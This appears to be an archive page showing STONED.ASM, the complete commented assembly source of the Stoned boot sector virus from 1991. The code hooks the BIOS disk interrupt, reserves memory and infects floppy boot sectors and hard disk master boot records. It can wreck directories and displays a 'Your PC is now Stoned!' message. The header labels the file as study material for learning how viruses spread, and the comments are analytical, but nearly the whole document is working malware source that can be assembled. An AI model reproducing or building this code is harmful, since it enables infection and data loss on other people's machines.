home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / SOURCE.ZIP / STONED.ASM < prev    next >
Encoding:
Assembly Source File  |  1991-01-29  |  20.5 KB  |  533 lines
  1. TITLE   STONBOOT        1-4-80  [5-12-90]
  2.  
  3. PAGE 27,132
  4.  
  5. ;*****************************************************************************
  6. ;
  7. ;         *** NOT FOR GENERAL DISTRIBUTION ***     The Stoned Virus
  8. ;
  9. ; This file is for the purpose of virus study only! It should not be passed
  10. ;  around among the general public. It will be very useful for learning
  11. ;  how viruses work and propagate. But anybody with access to an assembler
  12. ;  can turn it into a working virus and anybody with a bit of assembly coding
  13. ;  experience can turn it into a far more malevolent program than it already
  14. ;  is. Keep this code in reasonable hands!
  15. ;
  16. ; This is a boot sector virus, and an extremely tiny one. It occupies only a
  17. ;  single sector. On a diskette, it resides in the boot sector, and on a hard
  18. ;  disk resides in the mastor boot record. It can be installed on a 5 1/4 inch
  19. ;  diskette by copying the real boot sector to side 1, track 0, sector 3. This
  20. ;  is the last sector used by the directory, and is usually not used. If the
  21. ;  directory ever does expand into this area, then the real boot sector will be
  22. ;  trashed, and the diskette will no longer be bootable. Once the boot sector
  23. ;  is copied to the directory area, this code goes into the boot sector space
  24. ;  at side 0, track 0, sector 1. The system is then transferred to the diskette
  25. ;  and the diskette contains an activated virus. Once this diskette is used to
  26. ;  boot up a system, it will become resident and infect other diskettes it
  27. ;  sees. If the system contains a hard drive, it too will become infected.
  28. ;
  29. ; This virus does not contain any time bomb, but it can cause loss of data by
  30. ;  wrecking a directory here or there.
  31. ;*****************************************************************************
  32.  
  33.  
  34. LF      EQU     0AH
  35. CR      EQU     0DH
  36.  
  37. XSEG    SEGMENT AT      07C0h
  38.         ORG     5
  39. NEWSEG  LABEL   FAR
  40. XSEG    ENDS
  41.  
  42. CODE    SEGMENT
  43.         ASSUME DS:CODE, SS:CODE, CS:CODE, ES:CODE
  44.         ORG     0
  45.  
  46.  
  47. ;*****************************************************************************
  48. ; Execution begins here as a boot record. This means that its location and
  49. ;  CS:IP will be 0000:7C00. The following two JMP instructions accomplish only
  50. ;  a change in CS:IP so that CS is 07C0. The following two JMPs, and the
  51. ;  segment definition of XSEG above are best not tampered with.
  52. ;*****************************************************************************
  53.  
  54.  
  55.         JMP  FAR PTR NEWSEG     ;This is exactly 5 bytes long. Don't change it
  56.  
  57. ;The above line will jump to here, with a CS of 07C0 and an IP of 5
  58.  
  59.         JMP     JPBOOT                  ;Jump here at boot up time
  60.  
  61.  
  62. ;*****************************************************************************
  63. ; The following offsets:
  64. ;    D_TYPE
  65. ;    O_13_O
  66. ;    O_13_S
  67. ;    J_AD_O
  68. ;    J_AD_S
  69. ;    BT_ADD
  70. ;  will be used to access their corresponding variables throughout the code.
  71. ;  They will vary in different parts of the code, since the code relocates
  72. ;  itself and the values in the segment registers will change. The actual
  73. ;  variables are defined with a leading underscore, and should not be used. As
  74. ;  the segment registers, and the offsets used to access them, change in the
  75. ;  code, the offsets will be redefined with "=" operators. At each point, the
  76. ;  particular segment register override needed to access the variables will be
  77. ;  given.
  78. ;
  79. ; In this area, the variables should be accessed with the CS: segment override.
  80. ;******************************************************************************
  81.  
  82. D_TYPE  =       $               ;The type of disk we are booting from
  83. _D_TYPE DB      0
  84.  
  85. OLD_13  EQU     $
  86. O_13_O  =       $               ;Old INT 13 vector offset
  87. _O_13_O DW      ?
  88.  
  89. O_13_S  =       $               ;Old INT 13 vector segment
  90. _O_13_S DW      ?
  91.  
  92. JMP_ADR EQU     $
  93. J_AD_O  =       $               ;Offset of the jump to relocated code
  94. _J_AD_O DW      OFFSET HI_JMP
  95.  
  96. J_AD_S  =       $               ;Segment of the jump to the relocated code
  97. _J_AD_S DW      ?
  98.  
  99.  
  100. BT_ADD  =       $               ;Fixed address 0:7C00. Jump addr to boot sector
  101. _BT_ADD DW      7C00h           ;Boot address segment
  102.         DW      0000h           ;Boot address offset
  103.  
  104.  
  105.  
  106. ;**********************************************************
  107. ;       The INT 13H vector gets hooked to here
  108. ;**********************************************************
  109.  
  110. NEW_13: PUSH    DS
  111.         PUSH    AX
  112.         CMP     AH,2
  113.         JB      REAL13                  ;Restore regs & do real INT 13H
  114.  
  115.         CMP     AH,4
  116.         JNB     REAL13                  ;Restore regs & do real INT 13H
  117.  
  118. ;*****************************************************************
  119. ;    We only get here for service 2 or 3 - Disk read or write
  120. ;*****************************************************************
  121.  
  122.         OR      DL,DL
  123.         JNZ     REAL13                  ;Restore regs & do real INT 13H
  124.  
  125. ;*****************************************************************
  126. ;     And we only get here if it's happening to drive A:
  127. ;*****************************************************************
  128.  
  129.         XOR     AX,AX
  130.         MOV     DS,AX
  131.         MOV     AL,DS:43FH
  132.         TEST    AL,1                    ;Check to see if drive motor is on
  133.         JNZ     REAL13                  ;Restore regs & do real INT 13H
  134.  
  135. ;******************************************************************
  136. ;           We only get here if the drive motor is on.
  137. ;******************************************************************
  138.  
  139.         CALL    INFECT                  ;Try to infect the disk
  140.  
  141. ;******************************************************************
  142. ;                Restore regs & do real INT 13H
  143. ;******************************************************************
  144.  
  145. REAL13: POP     AX
  146.         POP     DS
  147.         JMP     DWORD PTR       CS:OLD_13
  148.  
  149.  
  150.  
  151. ;**************************************************************
  152. ;***          See if we can infect the disk                 ***
  153. ;**************************************************************
  154.  
  155. INFECT  PROC    NEAR
  156.  
  157.         PUSH    BX
  158.         PUSH    CX
  159.         PUSH    DX
  160.         PUSH    ES
  161.         PUSH    SI
  162.         PUSH    DI
  163.         MOV     SI,4            ;We'll try up to 4 times to read it
  164.  
  165. ;***************************************************************
  166. ;            Loop to try reading disk sector
  167. ;***************************************************************
  168.  
  169. RDLOOP: MOV     AX,201H         ;Read one sector...
  170.         PUSH    CS
  171.         POP     ES
  172.         MOV     BX,200H         ;...into a space at the end of the code
  173.         XOR     CX,CX
  174.         MOV     DX,CX           ;Side 0, drive A
  175.         INC     CX              ;Track 0, sector 1
  176.         PUSHF
  177.         CALL    DWORD PTR CS:OLD_13     ;Do the old INT 13
  178.  
  179.         JNB     RD_OK           ;Disk read was OK
  180.  
  181.         XOR     AX,AX
  182.         PUSHF
  183.         CALL    DWORD PTR CS:OLD_13     ;Reset disk
  184.  
  185.         DEC     SI              ;Bump the counter
  186.         JNZ     RDLOOP          ;Loop to try reading disk sector
  187.         JMP     SHORT   QUIT    ;Close up and return if all 4 tries failed
  188.  
  189.         NOP
  190.  
  191. ;******************************************************************************
  192. ; Here if disk read was OK. We got the boot sector. But is it already infected?
  193. ;  Find out by comparing the first 4 bytes of the boot sector to the first 4
  194. ;  bytes of this code. If they don't match exactly, infect the diskette.
  195. ;******************************************************************************
  196.  
  197. RD_OK:  XOR     SI,SI
  198.         MOV     DI,200H
  199.         CLD
  200.         PUSH    CS
  201.         POP     DS
  202.         LODSW
  203.         CMP     AX,[DI]
  204.         JNZ     HIDEIT                  ;Hide floppy boot sector in directory
  205.  
  206.         LODSW
  207.         CMP     AX,[DI+2]
  208.         JZ      QUIT                    ;Close up and return
  209.  
  210. ;************************************************************
  211. ;       Infect - Hide floppy boot sector in directory
  212. ;************************************************************
  213.  
  214. HIDEIT: MOV     AX,301H         ;Write 1 sector
  215.         MOV     BX,200H         ;From the space at the end of this code
  216.         MOV     CL,3            ;To sector 3
  217.         MOV     DH,1            ;Side 1
  218.         PUSHF
  219.         CALL    DWORD PTR CS:OLD_13     ;Do the old INT 14
  220.         JB      QUIT            ;Close up and return if failed
  221.  
  222. ;******************************************************************
  223. ; If write was sucessful, write this code to the boot sector area
  224. ;******************************************************************
  225.  
  226.         MOV     AX,301H         ;Write 1 sector ...
  227.         XOR     BX,BX           ;...of this very code...
  228.         MOV     CL,1            ;...to sector 1...
  229.         XOR     DX,DX           ;...of Side 0, drive A
  230.         PUSHF
  231.         CALL    DWORD PTR CS:OLD_13     ;Do an old INT 13
  232.  
  233. ;  ***NOTE*** no test has been done for a sucessful write.
  234.  
  235. ;***************************************************************
  236. ;                    Close up and return
  237. ;***************************************************************
  238.  
  239. QUIT:   POP     DI
  240.         POP     SI
  241.         POP     ES
  242.         POP     DX
  243.         POP     CX
  244.         POP     BX
  245.         RET
  246.  
  247. INFECT  ENDP
  248.  
  249.  
  250.  
  251.  
  252.  
  253. ;****************************************************************
  254. ;***             Jump here at boot up time
  255. ;****************************************************************
  256.  
  257.  
  258.  
  259.  
  260. ;*****************************************************************************
  261. ; Redefine the variable offsets. The code here executes in the memory area
  262. ;  used by the normal boot sector. The variable offsets have an assembled
  263. ;  value of the order 7Cxx. Access them here through the DS: segment override
  264. ;*****************************************************************************
  265.  
  266.  
  267. D_TYPE  =       07C00h + OFFSET _D_TYPE
  268. O_13_O  =       07C00h + OFFSET _O_13_O
  269. O_13_S  =       07C00h + OFFSET _O_13_S
  270. J_AD_O  =       07C00h + OFFSET _J_AD_O
  271. J_AD_S  =       07C00h + OFFSET _J_AD_S
  272. BT_ADD  =       07C00h + OFFSET _BT_ADD
  273.  
  274.  
  275.  
  276. JPBOOT: XOR     AX,AX
  277.         MOV     DS,AX           ;DS = 0
  278.  
  279. ;*********************************************************
  280. ;                Set up a usable stack
  281. ;*********************************************************
  282.  
  283.         CLI
  284.         MOV     SS,AX           ;SS = 0
  285.         MOV     SP,OFFSET 7C00H ;Position stack at 0000:7C00
  286.         STI
  287.  
  288. ;*********************************************************
  289. ;        Capture the INT 13 vector (BIOS disk I/O)
  290. ;*********************************************************
  291.  
  292.         MOV     AX,DS:4CH       ;Offset for old INT 13 vector
  293.         MOV     DS:O_13_O,AX    ;Save the offset
  294.         MOV     AX,DS:4EH       ;Segment for old INT 13 vector
  295.         MOV     DS:O_13_S,AX    ;Save the segment
  296.  
  297. ;*****************************************************************************
  298. ; Decrease the memory available to DOS by 2K. Only 1K really seems needed, but
  299. ;  stealing an odd number of K would result in an odd number shown available
  300. ;  when a CHKDSK is run. This might be too obvious. Or the programmer may have
  301. ;  had other plans for the memory.
  302. ;*****************************************************************************
  303.  
  304.         MOV     AX,DS:413H      ;BIOS' internal count of available memory
  305.         DEC     AX
  306.         DEC     AX              ;Drop it by 2K ...
  307.         MOV     DS:413H,AX      ;...and store it (steal it!!)
  308.  
  309. ;*********************************************************
  310. ;        Find the segment of the stolen memory
  311. ;*********************************************************
  312.  
  313.         MOV     CL,6
  314.         SHL     AX,CL
  315.         MOV     ES,AX
  316.  
  317. ;*********************************************************
  318. ;        Use the segment of the stolen memory area
  319. ;*********************************************************
  320.  
  321.         MOV     DS:J_AD_S,AX    ;Becomes part of a JMP address
  322.         MOV     AX,OFFSET NEW_13
  323.         MOV     DS:4CH,AX       ;Offset for new INT 13
  324.         MOV     DS:4EH,ES       ;Segment for new INT 13
  325.  
  326. ;****************************************************************
  327. ;Copy the code from 07C0:0000 to ES:0000 (the stolen memory area)
  328. ;****************************************************************
  329.  
  330.         MOV     CX,OFFSET END_BYT ;The size of the code (# of bytes to move)
  331.         PUSH    CS
  332.         POP     DS              ;DS = CS
  333.         XOR     SI,SI
  334.         MOV     DI,SI           ;All offsets of block move areas are 0
  335.         CLD
  336.         REPZ    MOVSB           ;Copy each byte of code to the top of memory
  337.         JMP     DWORD PTR       CS:JMP_ADR ;JMP to the transferred code...
  338.  
  339.  
  340.  
  341. ;**************************************************************
  342. ;    ...and we'll jump right here, to the transferred code
  343. ;**************************************************************
  344.  
  345.  
  346.  
  347. ;****************************************************************************
  348. ; Redefine variable offsets again. This code executes at the top of memory,
  349. ;  and so the exact value of the segment registers depends on how much memory
  350. ;  is installed. The variable offsets have an assembled value of the order of
  351. ;  00xx. They are accessed using the CS: segment override
  352. ;****************************************************************************
  353.  
  354. D_TYPE  =       OFFSET _D_TYPE
  355. O_13_O  =       OFFSET _O_13_O
  356. O_13_S  =       OFFSET _O_13_S
  357. J_AD_O  =       OFFSET _J_AD_O
  358. J_AD_S  =       OFFSET _J_AD_S
  359. BT_ADD  =       OFFSET _BT_ADD
  360.  
  361.  
  362. HI_JMP: MOV     AX,0
  363.         INT     13H             ;Reset disk system
  364.  
  365. ;**********************************************************************
  366. ;  This will read one sector into 0000:7C00 (the boot sector address)
  367. ;**********************************************************************
  368.  
  369.         XOR     AX,AX
  370.         MOV     ES,AX
  371.         MOV     AX,201H                 ;Read one sector
  372.         MOV     BX,OFFSET 7C00H         ;To boot sector area: 0000:7C00
  373.         CMP     BYTE PTR CS:D_TYPE,0    ;Booting from diskette or hard drive?
  374.  
  375.         JZ      DISKET                  ;If booting from a diskette
  376.  
  377. ;******************************************************
  378. ;            Booting from a hard drive
  379. ;******************************************************
  380.  
  381.         MOV     CX,7            ;Track 0, sector 7
  382.         MOV     DX,80H          ;Hard drive, side 0
  383.         INT     13H             ;Go get it
  384.  
  385. ;  ***NOTE** There was no check as to wether or not the read was sucessful
  386.  
  387.         JMP     SHORT   BOOTUP  ;Go run the real boot sector we've installed
  388.  
  389.         NOP
  390.  
  391. ;******************************************************
  392. ;            Booting from a diskette
  393. ;******************************************************
  394.  
  395. DISKET: MOV     CX,3            ;Track 0, sector 3
  396.         MOV     DX,100H         ;A drive, side 1 (last sector of the directory)
  397.         INT     13H             ;Go get it
  398.         JB      BOOTUP          ;If read error, run it anyway.(???) (A prank?)
  399.  
  400. ;****************************************************************
  401. ;Wether or not we print the "Stoned" message depends on the value
  402. ; of a byte in the internal clock time -- a fairly random event.
  403. ;****************************************************************
  404.  
  405.         TEST    BYTE PTR ES:46CH,7      ;Test a bit in the clock time
  406.         JNZ     GETHDB                  ;Get Hard drive boot sector
  407.  
  408. ;**************************************************************
  409. ;                      Print the message
  410. ;**************************************************************
  411.  
  412.         MOV     SI,OFFSET S_MSG ;Address of the "stoned message"
  413.         PUSH    CS
  414.         POP     DS
  415.  
  416. ;**************************************************************
  417. ;               Loop to print individual characters
  418. ;**************************************************************
  419.  
  420. PRINT1: LODSB
  421.         OR      AL,AL           ;A 00 byte means quit the loop
  422.         JZ      GETHDB          ;Get Hard drive boot sector, then
  423.  
  424. ;**************************************************************
  425. ;         Not done looping. Print another character
  426. ;**************************************************************
  427.  
  428.         MOV     AH,0EH
  429.         MOV     BH,0
  430.         INT     10H
  431.         JMP     SHORT   PRINT1  ;Print a character on screen
  432.  
  433.  
  434. ;**************************************************************
  435. ;               Get Hard drive boot sector
  436. ;**************************************************************
  437.  
  438. GETHDB: PUSH    CS
  439.         POP     ES
  440.         MOV     AX,201H         ;Read one sector...
  441.         MOV     BX,200H         ;...to the buffer following this code...
  442.         MOV     CL,1            ;...from sector 1...
  443.         MOV     DX,80H          ;...side 0, of the hard drive
  444.         INT     13H
  445.         JB      BOOTUP          ;If error, assume no hard drive
  446.                                 ; So go run the floppy boot sector
  447.  
  448. ;***************************************************************************
  449. ; If no read error, then there really must be a hard drive. Infect it. The
  450. ;  following code uses the same trick above where the first 4 bytes of the
  451. ;  boot sector are compared to the first 4 bytes of this code. If they don't
  452. ;  match exactly, then this hard drive isn't infected.
  453. ;***************************************************************************
  454.  
  455.         PUSH    CS
  456.         POP     DS
  457.         MOV     SI,200H
  458.         MOV     DI,0
  459.         LODSW
  460.         CMP     AX,[DI]
  461.         JNZ     HIDEHD                  ;Hide real boot sector in hard drive
  462.  
  463.         LODSW
  464.         CMP     AX,[DI+2]
  465.         JNZ     HIDEHD                  ;Hide real boot sector in hard drive
  466.  
  467. ;**************************************************************
  468. ;                Go run the real boot sector
  469. ;**************************************************************
  470.  
  471. BOOTUP: MOV     BYTE PTR CS:D_TYPE,0
  472.         JMP     DWORD PTR       CS:BT_ADD
  473.  
  474. ;**************************************************************
  475. ;         Infect - Hide real boot sector in hard drive
  476. ;**************************************************************
  477.  
  478. HIDEHD: MOV     BYTE PTR CS:D_TYPE,2    ;Mark this as a hard drive infection
  479.         MOV     AX,301H                 ;Write i sector...
  480.         MOV     BX,200H         ;...from the buffer following this code...
  481.         MOV     CX,7            ;...to track 0, sector 7...
  482.         MOV     DX,80H          ;...side 0, of the hard drive...
  483.         INT     13H             ;Do it
  484.         JB      BOOTUP          ;Go run the real boot sector if failed
  485.  
  486. ;**************************************************
  487. ; Here if the boot sector got written successfully
  488. ;***************************************************
  489.  
  490.         PUSH    CS
  491.         POP     DS
  492.         PUSH    CS
  493.         POP     ES
  494.         MOV     SI,3BEH         ;Offset of disk partition table in the buffer
  495.         MOV     DI,1BEH         ;Copy it to the same offset in this code
  496.         MOV     CX,242H         ;Strange. Only need to move 42H bytes. This
  497.                                 ; won't hurt, and will overwrite the copy of
  498.                                 ; the boot sector, maybe giving a bit more
  499.                                 ; concealment.
  500.         REPZ    MOVSB           ;Move them
  501.         MOV     AX,301H         ;Write 1 sector...
  502.         XOR     BX,BX           ;...of this code...
  503.         INC     CL              ;...into sector 1
  504.         INT     13H
  505.  
  506. ; ***NOTE*** no check for a sucessful write
  507.  
  508.         JMP     BOOTUP          ;Now run the real boot sector
  509.  
  510. S_MSG   DB      7,'Your PC is now Stoned!',7,CR,LF
  511.         DB      LF
  512.  
  513. ;*************************************************************************
  514. ; Just garbage. In one version, this contained an extension of the above
  515. ;  string, saying "LEGALIZE MARIJUANA". Some portions of this text remain
  516. ;*************************************************************************
  517.  
  518.         DB      0,4CH,45H,47H,41H
  519.         DB      4CH,49H,53H,45H,67H
  520.         DB      2,4,68H,2,68H
  521.         DB      2,0BH,5,67H,2
  522.  
  523. END_BYT EQU     $               ;Used to determine the size of the code. It
  524.                                 ; must be less than 1BE, or this code is too
  525.                                 ; large to be used to infect hard disks. From
  526.                                 ; offset 1BE and above, the hard disk partition
  527.                                 ; table will be copied, and anything placed
  528.                                 ; there will get clobbered.
  529.  
  530.         CODE    ENDS
  531.  
  532. END
  533.